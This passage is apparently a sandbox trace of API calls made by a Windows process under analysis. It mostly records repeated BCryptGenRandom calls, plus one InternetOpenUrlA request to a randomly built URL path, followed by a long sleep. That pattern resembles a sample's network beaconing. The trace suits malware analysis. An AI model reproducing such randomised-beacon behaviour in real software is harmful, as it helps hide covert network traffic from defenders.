(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0154.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0154.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0154.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0154.005] GetProcessHeap () returned 0x440000 [0154.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473fb0 [0154.005] lstrcpyA (in: lpString1=0x473fb0, lpString2="\x90SM" | out: lpString1="\x90SM") returned="\x90SM" [0154.005] lstrcatA (in: lpString1="\x90SM", lpString2="/agviky89Bws72fj4g4Au2w45j34lafqf8ixb3u/5tt20jja7ljwg6pbq3u8ymX5gek3x68i5x/qz3r3ob88Rdwo1k0xfqsyD/rHzle5nFpx046Sdphr2nfhxufZrehw4bb39e/" | out: lpString1="\x90SM/agviky89Bws72fj4g4Au2w45j34lafqf8ixb3u/5tt20jja7ljwg6pbq3u8ymX5gek3x68i5x/qz3r3ob88Rdwo1k0xfqsyD/rHzle5nFpx046Sdphr2nfhxufZrehw4bb39e/") returned="\x90SM/agviky89Bws72fj4g4Au2w45j34lafqf8ixb3u/5tt20jja7ljwg6pbq3u8ymX5gek3x68i5x/qz3r3ob88Rdwo1k0xfqsyD/rHzle5nFpx046Sdphr2nfhxufZrehw4bb39e/" [0154.005] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0154.005] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x90SM/agviky89Bws72fj4g4Au2w45j34lafqf8ixb3u/5tt20jja7ljwg6pbq3u8ymX5gek3x68i5x/qz3r3ob88Rdwo1k0xfqsyD/rHzle5nFpx046Sdphr2nfhxufZrehw4bb39e/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0154.007] GetProcessHeap () returned 0x440000 [0154.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473fb0 | out: hHeap=0x440000) returned 1 [0154.007] GetProcessHeap () returned 0x440000 [0154.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5390 | out: hHeap=0x440000) returned 1 [0154.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0154.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0154.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0154.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0154.008] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0154.008] Sleep (dwMilliseconds=0x19aa2) [0164.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0164.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0164.954] GetProcessHeap () returned 0x440000 [0164.954] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17200 [0164.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0164.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17201, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a17201) returned 0x0 [0164.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0164.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0164.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17227, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a17227) returned 0x0 [0164.966] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0164.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0164.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1724b, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a1724b) returned 0x0 [0164.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.980] BCryptGenRandom (in: 